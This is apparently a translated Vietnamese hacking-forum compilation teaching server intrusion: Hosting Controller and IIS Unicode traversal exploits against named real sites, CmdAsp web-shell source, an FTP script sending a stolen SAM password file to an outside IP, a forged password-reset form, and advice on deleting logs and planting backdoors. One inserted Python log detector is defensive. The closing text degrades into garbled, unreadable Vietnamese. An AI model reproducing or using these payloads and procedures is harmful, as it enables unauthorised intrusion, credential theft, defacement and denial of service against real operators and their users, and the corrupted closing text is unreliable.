
The Steps of Hacking a Server!

The steps a hacker takes when he wants to break into a server system:

<Step 1> Footprinting: the main goal of this step is initial information about the server. The techniques you need are: open source search, Whois, web interface to whois, ARIN Whois, DNS zone transfer (this part mainly checks the server's owner, DNS, etc.; the server's structure is not yet clear at this point). Some tools: UseNet, search engines, Edgar, any Unix client, http://www.networksolutions.com/whois , http://www.arin.net/whois , dig, nslookup ls -d, Sam Spade.
<Step 2> Scanning: most servers give away important information at this step; try to make the most of it to learn the ports on the server and sniff data. The techniques you need are: ping sweep, TCP/UDP port scan, OS detection. Tools: fping, icmpenum, WS_Ping ProPack, nmap, SuperScan, fscan, nmap, queso, siphon.
<Step 3> Enumeration: by this step the attacker starts to take preliminary control of the server, identifying the accounts on the server, the level of protection, etc. The techniques you need are: list user accounts, list file shares, identify applications. Supporting tools: null sessions, DumpACL, sid2user, OnSite Admin, showmount, NAT, Legion, banner grabbing with telnet, netcat, rpcinfo.
<Step 4> Gaining access: aha, with enough data, combine all of it. We start closing in on the target. Seize the opportunity: an account can be cracked. Techniques: password eavesdropping, file share brute forcing, password file grab, buffer overflows. Tools: tcpdump, L0phtcrack readsmb, NAT, Legion, tftp, pwdump2 (NT), ttdb, bind, IIS .HTR/ISM.DLL.
<Step 5> Escalating privilege: if some unlucky account at some level was cracked in the step above, we try to use it to control the server. Techniques: password cracking, bugs, exploits. Tools: john, L0phtcrack, lc_messages, getadmin, sechole.
<Step 6> Pilfering: with the information taken from the step above, we locate the server and control it. If this step fails, go to step <9>. Techniques: evaluate trusts, search for cleartext passwords. Tools: rhosts, LSA Secrets, user data, configuration files, Registry.
<Step 7> Covering tracks: the system always records your actions. If you stop here, you will surely be found right away. This is an extremely important step. DELETE THE LOGS. Techniques: clear logs, hide tools. Tools: Zap, Event Log GUI, rootkits, file streaming.
<Step 8> Creating backdoors: needless to say, you must leave a backdoor so that getting in next time is easier. If it does not succeed, go back to step <4> and review the permissions of the user you are using. Techniques: create rogue user accounts, schedule batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojans. Tools: members of wheel/administrators, cron, At, rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, add acct to secadmin mail aliases, login, fpnwclnt.dll.
<Step 9> Denial of Service: an attacker who does not succeed with what he is doing... will use exploit code to make the server stop working altogether, which is called a denial-of-service attack. Techniques: SYN flood, ICMP techniques, identical src/dst SYN requests, overlapping fragment/offset bugs, out of bounds TCP options (OOB), DDoS. Supporting tools: synk4, ping of death, smurf, land, latierra, teardrop, bonk, newtear, supernuke.exe, trinoo/TFN/stacheldraht.
The tools above can be found with search engines such as http://www.google.com
Hacking an NT Server through the Hosting Controller bug:
The HC bug is a bug in the Hosting Controller software, which is used to manage servers that provide domains and hosting to customers and usually runs under Win2000/NT. I will hack through the HC bug and demonstrate on an unpatched server, a server holding 38 sites that Hacker Forum hacked last month.
+ The HC bug lets you run a command line on the drives (C; D; E), even A, of the server, through a site or directly by the server's ID. The HC bug is really a bug in 4 files of the software: statsbrowse.asp; servubrowse.asp; browsedisk.asp; browsewebalizerexe.asp; sqlbrowse.asp
I will write the structure of the command for hacking into the server through these 4 files:
..................
Where HC can be: admin; advadmin; hostingcontroller
The first bug I introduce to you is called Multiple security vulnerabilities. These are the scripts that let you browse any file on the server:
http://www.victim.com/advwebadmin/stats/st...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/serv_u/s...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3

http://www.victim.com/advwedadmin/SQLServ/...epath=c:/&Opt=3
Where victim is the server with the HC bug that you want to hack.
I will demonstrate how to hack a server through one site hosted on the server (also called hacking via local exploit).
Example: this site was hacked by Hacker Forum: http://123hollywood.com/hf.htm
In the address bar, type one of the following lines:
http://123hollywood.com/admin/stats/statsb...=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servu...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlb...=c:\&Opt=3
Now you get into the "Browser Directories" section. This is the whole structure of the website. When you get inside C:\ you will see a websites folder (on this test server; on other servers it usually lies in D:/).
If you see it, then OK. Go inside and you will see a whole series of websites. On the server we are hacking here, you will see the websites put into separate folders in alphabetical order. Let us find the website through which we got into this server. Go to 123web/123kinh/123hollywood.com/www/. Extremely simple, isn't it.
Once you know the path of the site you want to hack, use the following script:
http://www.example.com/advwebadmin/folders...om&OpenPath=C:/
Replace example with the name of the server and testing with the name of the website you want to hack.
Example: you register a website named cuonglong with FPT, so FPT gives you a place for the page: c:\webspace\resadmin\cuonglong\cuonglong.com\www
To hack this page, type the script as above:
http://www.ftp.com/advwebadmin/folders/fil...om&OpenPath=C:/
So you have got into the website's directory structure, but at this point you only have permission to upload a file from your drive onto the site.
Then upload the file ntdaddy.asp onto the website, and run it on the website to take the *.mdb and *.SAM files, which are the files that hold the passwords; you only have to decode them.
So you have hacked the website.
Now I will show you how to upload and delete files on these sites:
This is also extremely simple; look at the following sample:
http://www.eg.com/hc/folders/filemanager.a...om&OpenPath=C:/
where testing is the path into the website you want to upload to; OK!
Now you can play around freely; you could even make the whole site die within an hour, but that is a bit wicked..
There are a few more HC bugs, among them one that gives you the ability to create yourself a hosting account on the server with the following line:
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
As above, victim is the server with the HC bug that you want to hack. For example the website http://bigguy.ourweb.net/ :
http://bigguy.ourweb.net/AdvAdmin/autosign...newwebadmin.asp
I created this one; go and see it at: http://www.hackerforum.com/
This bug lets you register a free domain. Register a domain for yourself right away, then go to http://www.victim.com/AdvAmin/ and log in with the account you just registered. After logging in, click Directories on the menu and go into your domain. Then upload your web page (the upload spot is at the very bottom) and remember the page name shown below, then click logout (top right). So we have gone halfway.
Next, go to: http://www.victim.com/AdvAdmin/import/imp_...in.com\www
Replace the word "username" with the username you registered the domain with at the start, and replace www.yourdomain.com with the domain address you registered, then press Enter. For example, I registered a domain named http://www.cuonglong.com/ with the username ncviet on the website http://bigguy.ourweb.net/ , so I type:
http://bigguy.ourweb.net/AdvAdmin/import/i...onglong.com/www
This is the website's Import section. It shows 4 path frames. Now find your web page in the first lower frame, click it, and press the "import" button. Now it copies your web page into the second lower frame. OK, so you have finished hacking. For example, if you uploaded the file cl.htm, your page's web path will be:
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Note: http://www.victim.com/ is to be replaced with the website that has the HC bug. And during the hack the server may capture your IP, so disguise yourself well.
You can find many servers that are still vulnerable to this bug by going to http://www.google.com/ and entering the keyword "Hosting Controller", then pressing Search.
Next is a slash-dot-dot bug in HC that lets us see the drive paths and folders of the server, and we can abuse it to add a DSN path pointing to a new address. To exploit this bug, use the following code:
http://www.target.com/admin/dsn/dsnmanager....\..\
The second is that we can completely change or add to the admin folder and execute whatever we want. To exploit this bug, just enter the following code:
http://www.target.com/admin/import/imp_roo...tpPath=C:\
You can take control of all the files in the folder (and possibly all of C:\) and change them as you like..
And the last bug is the default password: if the admin has not deleted or changed the user named AdvWebadmin (the default user), this is very dangerous, because we can take complete (or partial) control of the server through this user's default password, "advcomm500349", after which hacking is only an easy matter.
By the way, let me also show you how to install a trojan or a DoS (Denial of Service) program on the server you got into, to serve your hacking later on. Usually, when hacking through the HC bug, it is very hard to install a program directly into C:/ as with the IIS bug. But we can still install a program by setting it up through a site hosted on the server. Upload a trojan into a site we want (upload as described above). Below I will install a reaccserver, which, once installed on a server, lets us control the server from our home computer. I uploaded the file reaccserver.exe onto the site http://123hollywood.com/ .
Now, to install this trojan on the server, type the following line:
http://123hollywood.com/reaccserver.exe
You may ask how it can be installed on the server without going through the host's notification. Right, usually hosting management software does notify the host, but server administrators usually skip this spot when installing HC. When you type the line above, if it succeeds IE will report "server setup file full". If it does not succeed, it reports "Can't not Found". In that case type again:
http://123hollywood.com/../../../reaccserver.exe
guaranteed to be OK
Note: when the file is set up, your own PC will also get the program installed. Remove it. We have just installed the reaccserver trojan. Now use the remaining part of the program, the file cp.exe. We can Shutdown or Restart that server. Usually the server takes at least 3 minutes to restart.
Now let me say a bit more about a bug on a number of websites on servers running HC: the upload.asp files usually sit in the websites' folders. So even if the HC bug has been fixed, we can still hack as usual.
Here is an example: http://www.aten2000.com/aspupload_samples_...rmAndScript.asp See! I can upload any file I want. Now let us find the usual structure of a website running HC. Go here: http://www.aten2000.com/cmd.asp to view the whole server with the commands dir C:\ ; dir D:\ ; dir E:\ and read files with the command type C:\..[path].. ----> Note: this command can read any file.
Try searching and you will find lots.
When you get into a server, you should install an ASP file to have a command line. Here is the structure of the file cmd.asp:
----------------------------------------------------------------------
<%@ Language=VBScript %>
<%
' --------------------o0o-------------------' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT

' ------------------------------------------
Dim oScript


Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
------------------------------------------------------------------------------------
NTDaddy can be downloaded here: ntdaddy download
On some servers, for reasons unclear, we have to use both cmdasp and ntdaddy together to be effective.
To exploit, there are 2 extremely important sources of information we need to look at first: HC's database and the file sam._, which hold all the information about the hosts on the server. The file sam._ is really only a backup, may not exist, and is usually stored in winnt\repair. The real SAM is in winnt\system32\config, but it is locked and very hard to take. After getting sam._, use l0pht or LC3 (download from http://www.l0pht.com/ or many places on the net) to crack it.
As for the hosts' database, it is usually stored in HC's installation folder, e.g. c:\program files\advanced communitations\NT web hosting\...., and is an Access file.
How do you download these files!? There are a few ways: if you know where the hosts' data is stored on the server (e.g. in the form d:\users\www\democoun\www, which when browsed in the browser is really http://www.democoun.com/ for instance - this is only an example, you must find the specific folder yourself, which is very important), you can use the copy command to copy these files straight into that folder, then download them directly from the browser, like www.democoun.com/sam._ .
Another way is to use ftp to send the file you want to an ftp address you know, by typing the commands in cmdasp.asp or ntdaddy.asp (Kha provided me with this method). However, we cannot enter and run each interactive ftp command with these tools; you have to create a text file containing the list of commands and ask ftp to run those commands. To create a text file, we use the echo command; see the following example:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
After entering it into cmdasp's command textbox and running, this command creates a file c:\dl.txt containing the command "open 111.214.156.105". Roughly the same for the other commands; e.g. the following command adds a line after the open command in the file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Note that from the 2nd command onwards, we must use ">>" instead of ">". Do the same with the remaining commands, so that the commands in dl.txt for ftp-sending a file contain at least the following:
OPEN 111.214.156.105
USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
The commands above will send the file c:\sam._ on the server you are hacking to the anonymous address 111.214.156.105.
So you have finished creating an ftp script file. Now use the following command to execute the commands in dl.txt. First, change to the folder holding dl.txt with the command cd c:\, then enter the following into cmdasp's command box: "ftp -n -s:c:\dl.txt" and Run!
If it succeeds, i.e. the browser reports no error and only shows the ftp connection information... then the file sam._ has been sent to the anonymous address above. You just ftp in and download it. Then use the L0phtCrack program to decode the SAM file.
Note: once the files you copied have been downloaded, delete them to avoid being detected.
To find websites with the Hosting Controller bug, go to http://www.google.com/ and type: "allinurl:/advadmin" (without the quotes), then press the Google Search button.
Frankly, what I found is nothing new, just making use of the known HC bugs. Just like applying theory to exercises!
:smg]
After registering an account with the path:
http://www.victim.com/hc/autosignup/dsp_newwebadmin.asp
you have the right to UPLOAD trojans and backdoors onto the server. But how to activate them? Follow these steps:
1. Find the IP address of the server machine hosting the web page.
2. Type the path to the trojan in the following form (I only know cmdasp.asp and ntdaddy.asp, so I installed them):
http://server-IP-address/resadmi....asp.asp
(http://server-IP-address/restadmin/the-username-you-registered/www/cmdasp.asp).
Depending on the server, this path may differ a little. You can use one of the 5 bugs above to view the server's directory structure and know it clearly and exactly. The server-IP-address corresponds to the WWWROOT folder on the server.
At this point there are 2 possibilities:
* The server admin gives you the right to create, delete and copy files on the machine. Then it's OK: take the password files and crack them. Or do whatever you like. :smg]
* You can only use normal commands like dir, net user, netstat, ... but cannot delete or copy files. What now :sad] ? Let us go to step 3.
(Talking to the admin the other day, I said the success rate could be 60% for this very reason. If you meet a careful admin who blocks writing to all the drives, we are stuck. Then it will have to depend on you.)
3. :shy] Luckily, you can exploit in another way, by adjusting the file Autoexec.bat with the ECHO command in CMDASP.ASP. Now find backdoors or trojans that can install themselves and hide on a WinNT server. If you do not have one, go to TLSECURITY.NET or GOOGLE.COM to search. Next, upload it to your account. Then modify the content of the file AUTOEXEC.BAT (in the C:\ folder) by using the ECHO command in cmdasp.asp to add a command line, which is the path to the executable of the backdoor (or trojan) you uploaded. Done!!
:smoking]
Now you have achieved the goal of breaking into the web page; celebrate the victory.
Success or failure otherwise depends on your skill and experience in covering your tracks and hacking.
Good luck!!
If something is missing (I think there surely is), please correct it for me, many thanks!!
Have fun!!
Bye
--------------------------------------------------------------------------------------------------
If Hosting Controller has not been patched, you should not use this method, because its success rate is very low; in my opinion not even 6%, let alone 60%. These are the conditions that must be met to use the method above:
- First: you must find the server's real IP. The server's real IP is the IP that points into wwwroot on drive C (by default). A server is configured with many IPs, especially a hosting server, so finding the real IP is very hard; even once you are inside the server, finding the real IP is still a problem, let alone loitering outside the server.
- Second: resadmin's web folder (the folder holding the website created with resadmin's rights, which we abused the HC bug to create an account with) must lie inside the wwwroot that the real IP points to; for example resadmin's web folder must be at C:\inetpub\wwwroot\resadmin\viethacker\viethacker.net\www . In practice this is rarely the case, because hosts usually put the web user directory somewhere else or on another drive to be safe.
- Third: in case you find the real IP and resadmin's web folder is placed inside the wwwroot the real IP points to, there is the further condition that wwwroot is not permission-restricted for the web user, meaning the web user can access the files and subfolders of wwwroot from the real IP.
- In the rare case that all 3 conditions hold and you get into the server but have not yet got Admin rights, it is still hard to exploit because of many restrictions on the server side, and many trojans are only effective when run with Admin rights, while here we only get into the server with the web user's rights. Find a way to get Admin rights while in the server as a web user.
The file /accounts/updateuserdesc.asp does not check the logged-in user on submit, so by editing this file we can change the password of any user.
How to do it:
This is for those of you who created a webadmin user; anyone who created a reseller admin has it simpler (study it further yourselves).
First, save the following file as updateuserdesc.asp on your drive:
updateuserdesc.asp
<!--Session Variable Names Reference-->
<!-- #include file="adovbs.inc"-->
<html>
<head>
<title>Update User Information</title>
<META HTTP-EQUIV="Expires" CONTENT="-1">
<META HTTP-EQUIV="Pragma" CONTENT="No-Cache">
<script type="text/javascript"
src="http://www.yourvictim.com/admin/css/jslib.js"></script>
<link rel="stylesheet" type="text/css"
href="http://www.yourvictim.com/admin/css/tbset.css">
<link rel="stylesheet" type="text/css"
href="http://www.yourvictim.com/admin/css/tbset.css">
<script language="JavaScript">

function CheckEntries(frm)
{
var flag;
Empty = false;
if (frm.PassCheck.checked )
{
if (frm.Pass1.value == "" )
{
alert("The password or confirm password are empty");
frm.Pass1.focus();
return false;
}
}

frm.action="http://www.yourvictim.com/admin/accounts/AccountActions.asp?ActionType=UpdateUser&UserName="+frm.UserName;
frm.submit();
}
function GoBack(frm)
{
frm.action="AccountManager.asp";
frm.submit();
}
</script>
</head>
<body>
<form name="newUserForm"
action="http://www.yourvictim.com/admin/acounts/AccountActions.asp?ActionType=UpdateUser"
method="post" onSubmit="return CheckEntries(newUserForm)">
<center><h2>Update User Account</h2><p></center>
<center>
<table BORDER="0" align="center" CELLSPACING="1" CELLPADDING="1"
width="60%" class="trhead">
<tr>

<td>Alter</td>
<td>User Information</td>
</tr>
</table>
<table align="center" class="trbody" width="60%">
<tr>
<td>
User Name:
</td>
<td>
killuser
</td>
<input type="hidden" name="UserName" value="killuser">
</tr>
<tr>
<td>
Full Name:
</td>
<td>
<input name="FullName" align="LEFT" tabindex="2" title="New Full Name"
value="killuser">
</td>
</tr>
<tr>
<td>
Description
:
</td>
<td>
<input name="Description" align="LEFT" tabindex="3" title="Description" value="">
</td>
</tr>
<tr>
<td>
Change Password Also:
</td>
<td>
<input type="checkbox" name="PassCheck"

value="TRUE">&nbsp;&nbsp;&nbsp;&nbsp;
<a
href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/change_password.htm')"><img src="..\images\help.gif" border="0" value="Help"></a>
</td>
</tr>
<tr>
<td>
New Password&nbsp;
:&nbsp;
</td>
<td>
<input type="password" name="Pass1" align="LEFT" tabindex="4" title="Password">
</td>
</tr>
<tr>
<td>
Account Disabled:
</td>
<td>
<input type="checkbox" name="AccountDisabled" align="LEFT" tabindex="6"
title="Account
Disabled" >&nbsp;&nbsp;&nbsp;&nbsp;
<a
href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/disable_account.htm')"><img src="..\images\help.gif" border="0" value="Help"></a>

</td>
</tr>
<tr>
<td>
User Cannot Change password:
</td>
<td>
<input type="checkbox" name="UserChangePassword" align="LEFT" tabindex="7"
title="Change
Password" >
</td>
</tr>
</table>
<input type="hidden" name="ActionType" value="AddUser" title="AddUser">
<table WIDTH="60%" ALIGN="center" CELLSPACING="1" CELLPADDING="1"
class="trhead">
<tr>
<td><input type="button" class=butn name="Update" value="Update User"
align="MIDDLE" tabindex="7" title="Submit" onclick="return
CheckEntries(this.form)"></td>
<td><input type="button" class=butn name="Cancel" value="Back"
align="MIDDLE" tabindex="7" title="Submit" onclick="return
GoBack(this.form)"></td>
</tr>
</table>
</form>
</body>
</html>

Remember to change www.yourvictim.com and killuser (the username of the user whose password you want to change).
Then go to www.yourvictim.com and log in with your webadmin account. Change the URL address to c:\your dir\updateuserdesc.asp ; HC's updateuser page will appear with username = killuser; you just check "Change Password Also", enter the new password into "New password", then Submit ==> DONE
Check it by logging in as the user "killuser". You can find user names by browsing the subfolders in HC's web root, since the folder name is the user name.
Note that changing the password will be detected as soon as the real user logs in, so do not abuse it.
IIS Server
Hello everyone! Today I continue introducing to you another technique for hacking into IIS servers. This document is not mine; I only "picked it up" on the Internet and have practised it. I found it interesting, so I want to exchange it with you.
Step 1:
You need a Unicode file in Perl form (*.pl) and a Perl program.
Step 2:
After preparing everything, go to DOS and type:
perl unicode.pl
You will see Host: (type the address of the website you want to determine whether it is IIS)
Port: type 80.
.....
Wait a bit; if it is IIS it will look for the bugs on IIS. The file Unicode.pl contains about 20 bugs.
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2] /scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4] /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11] /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
Step 3:
Open the browser, type the web address and paste in the bug part that Unicode detected.
Example: I type
perl unicode.pl
Host: http://www.tnh.com.vn
Port: 80
After it scans, I see this host has 2 bugs, 14 and 18. I can use either of these 2 bugs. Say I use bug 18.
I open the browser and in the address bar I type:
http://www.tnh.com.vn/_vti_bin/..%c0%af..%...m32/cmd.exe?/c+
So you have broken into IIS. You can access the IIS drive as if it were your own. You can create, delete and move folders and files, upload, download and run files on that server... For that you only need DOS commands. Don't tell me you don't know DOS commands.
Example: to read drive C ---- you type dir+c:\ ---- corresponding to the line in the browser:
http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\
Similarly there are commands like md, rd, ren... Just go back over the DOS book and everything is OK.
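As an added example (not part of the original post), the following Python detector flags the traversal requests listed above in web server log lines from the defender's side. It decodes percent-encoded paths with the same leniency that let these sequences through, so it catches the overlong forms above as well as variants such as %c1%1c that a strict decoder would reject; the log lines are constructed for the example.

```python
"""Detect the IIS 'Unicode' traversal requests listed above in web server logs.

Paths are decoded the way the lenient, pre-patch decoder did: the low six bits
of every byte after a multi-byte lead byte are taken without validation, which
is why %c1%1c (second byte not a continuation byte) still yielded a backslash.
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log lines (Common Log Format); not taken from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2001:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1234
10.0.0.7 - - [01/Jan/2001:10:00:01 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 567
10.0.0.7 - - [01/Jan/2001:10:00:02 +0000] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+type+c:\\boot.ini HTTP/1.0" 200 89
10.0.0.9 - - [01/Jan/2001:10:00:03 +0000] "GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
10.0.0.9 - - [01/Jan/2001:10:00:04 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 120
10.0.0.8 - - [01/Jan/2001:10:00:05 +0000] "GET /docs/caf%c3%a9.html HTTP/1.0" 200 2048
10.0.0.8 - - [01/Jan/2001:10:00:06 +0000] "GET /images/logo%20final.gif HTTP/1.0" 200 4321
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')
SEPARATORS = {"/", "\\"}

# (lead-byte floor, sequence length, lead payload mask, smallest code point that
# legitimately needs this many bytes); a decoded value below that is overlong.
LEAD_TABLE = (
    (0xFC, 6, 0x01, 0x4000000),
    (0xF8, 5, 0x03, 0x200000),
    (0xF0, 4, 0x07, 0x10000),
    (0xE0, 3, 0x0F, 0x800),
    (0xC0, 2, 0x1F, 0x80),
)


def lenient_utf8_decode(data: bytes) -> list:
    """Return (char, overlong) pairs; strict and lenient agree on valid UTF-8."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:  # plain ASCII
            out.append((chr(b), False))
            i += 1
            continue
        spec = next((s for s in LEAD_TABLE if b >= s[0]), None)
        if spec is None or i + spec[1] > len(data):  # stray continuation or truncated
            out.append(("\ufffd", False))
            i += 1
            continue
        _, length, mask, minimum = spec
        cp = b & mask
        for k in range(1, length):
            cp = (cp << 6) | (data[i + k] & 0x3F)  # continuation bits, unvalidated
        out.append((chr(cp) if cp <= 0x10FFFF else "\ufffd", cp < minimum))
        i += length
    return out


def analyze_request_path(raw_path: str) -> dict:
    """Classify one raw (still percent-encoded) request path."""
    chars = lenient_utf8_decode(unquote_to_bytes(raw_path))
    decoded = "".join(c for c, _ in chars)
    overlong_total = sum(1 for _, ol in chars if ol)
    overlong_seps = sum(1 for c, ol in chars if ol and c in SEPARATORS)
    normalised = decoded.replace("\\", "/")  # treat '..\' like '../'
    traversal = "/../" in normalised or normalised.startswith("../")
    if traversal and overlong_seps:
        verdict = "unicode-traversal"
    elif traversal:
        verdict = "plain-traversal"
    elif overlong_total:
        verdict = "overlong-encoding"
    else:
        verdict = "clean"
    return {
        "decoded": decoded,
        "overlong_separators": overlong_seps,
        "cmd_exe": "cmd.exe" in normalised.lower(),
        "verdict": verdict,
    }


def scan_log(log_text: str) -> list:
    """Run analyze_request_path over every request line of a log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m:
            findings.append(analyze_request_path(m.group("path")))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        if f["verdict"] != "clean":
            print(f["verdict"], f["decoded"])
```

Run against real IIS logs, any "unicode-traversal" hit with cmd_exe set is the signature of the requests this post describes; "overlong-encoding" alone is still worth a look, since no legitimate client emits overlong UTF-8.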
P/S: The web page is usually in inetpub\wwwroot
You only need to go in there and replace its index.html with your own index.html. So OK! That website is hacked. Remember to use programs to hide your IP to be safe. Otherwise you'll be peeling calendars in jail before you know it. Below are a few websites that use IIS

How to identify the bug and how to break into the server's drive I already covered in the previous post. Let us assume you have broken into that site's drive.
To download a file, use the type command (views a file's contents in DOS). With *.html and *.txt files it will view the contents for you; with files that cannot be viewed it pops up a window asking to Save to disk (not every server can do this, it depends).
Example: I want to download a file on www.tnh.com.vn (I only practise on this one). I type
http://www.tnh.com.vn/_vti_bin/..%c0%af..%...ype+c:\name of the file to download.
Please do not abuse this or wreck sites too much.
P/S: Hacking IIS is fine, but wandering the Internet I see most sites use Apache. I am practising hacking Apache. I currently have a document that teaches hacking Apache, quite easy to understand when reading.... But when practising it never works; I do not know whether the server is patched or I am dumb. Anyone who knows how to hack Apache, please guide us.... FPT's website also uses IIS, but unfortunately it has been patched.
UPLOADING FILES TO AN IIS SERVER
I will continue introducing to you how to upload files onto an IIS that has the bug. This post was not written by me; I only learned it, found it interesting, so I post it for you. First you need to download the code (also named Unicode) from: http://www.cners.com/tools/unicode.zip
Run the file tftpd32.exe (or tftpd.exe, I forget); if it is unclear, just rename so that you have both files tftpd.exe and tftpd32.exe.
Run this file, then look at the IP number and write it down.
Use notepad to open the file uniexe.pl, and change xxx.xxx.xxx.xxx to the IP number you just got from tftpd.
Change the parameters on the same line as the xxx.xxx.xxx.xxx you just filled in:
+ change "GET ncx99.exe" to "GET yyy.zzz", where yyy.zzz is a file on your drive
+ replace the part C:\inetpub\scripts with the path to the folder you want to upload the file to; see the following example to be clearer:
#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i 202.162.63.126 GET index.htm c:\\inetpub\\wwwroot\\index.htm";
---> in the example above I copied a file from my C:\ folder (my IP is 202.162.63.126) to C:\inetpub\wwwroot\ of the server with the unicode bug.
Then go out to DOS and type
Perl <server IP>:<port>
Example: perl uniexe.pl 202.162.45.78:80
If there is no problem, the file has been uploaded to the server.
Note: besides uploading *.html files, you can upload remote-access trojans or getadmin programs for WinNT to seize admin rights and then roam freely in this server.
To run a file on the server, go to DOS and type:
Perl uniexe.pl <website IP>:<port> <name of the file to run (with full path)>.
P/S: Not every server lets you create, move or run on it. It depends on the admin. Some of you said that when scanning you found no bug; it is probably all patched. You need to look for another website.... As far as I know, websites in Thailand use IIS a lot. I am practising, so I don't need many servers; I am currently practising on http://www.tnh.com.vn/
Anyone who wants can go straight into its drive to practise, by copying the following code into your browser's address bar.
http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\
Go in and create a folder HKC-LPTV. Oh, I forgot: to be safe you should use proxies to get into this machine.
After a busy stretch of making money and *having fun* (anyway, for those who really want to know what I have done in the last three months, pay a visit to http://www.phpmvc.net , a PHP port of Jakarta Struts), mrro now has a bit of free time, and actually it is because today, sitting and rummaging through the old folders that mark *a glorious period* of old, I suddenly came across a rather amusing file, so I am bringing it out to tell everyone. Hehe, it is just for fun.

Mt pht cho lut chi: tt c cc thng tin v li bo mt trong bi vit ny u c


thng bo cho nhng bn lin quan v n thi im ny th nhng l hng c
sa cha. (trong bi vit ny c mt s on h cu thm).
No chng ta cng bt u....
Hi 1: Ba bn tng la, chuyn nghip lm, dn amatuer lm sao hack ni!
Mt ngy ti tri u thng 8 nm ngoi, ang ngi trong phng lm vic ta son Tui
Tr, bt cht c ngi bc vo, h th ra l sp ph tng bin tp, i cng vi sp cn c
hai ba ngi khc na, nghe ni l ng nghip bn bo Si Gn Gii Phng sang chi.
"N gii thiu vi cc anh, hacker ca Tui Tr n", va ni sp va ch thng v mnh.
Tri i, ngi mun cht! T trc ti gi, thng mrro s nht 2 chuyn (1) ai hi "eh
bit hack Yahoo! Mail hng?" (2) b ngi ta ku l hacker.
Thi bui g khng bit, *hacker* cn qu hn vng , mi nghe nhc ti ch *hacker*,
mt ng bn SGGP nhy vo b vai, nhn chm chm vo mt thng mrro (coi coi n
ging ngi khng?! ). "Chc li sp ku hack ci ny ci n na ri n", thng mrro
thm chi ra. Y nh rng:
- Hacker h? Ba no th hack ci www.sggp.org.vn xem, c hack thoi mi i, ph cho
h cng c, hihi, bn anh cng ang mun lm li ci website . Ba nh bo va ni
va ci nham nh.
-Tri i, ng nghe sp em ni, em c bit hack hic g u. Thng mrro p ng tr li.
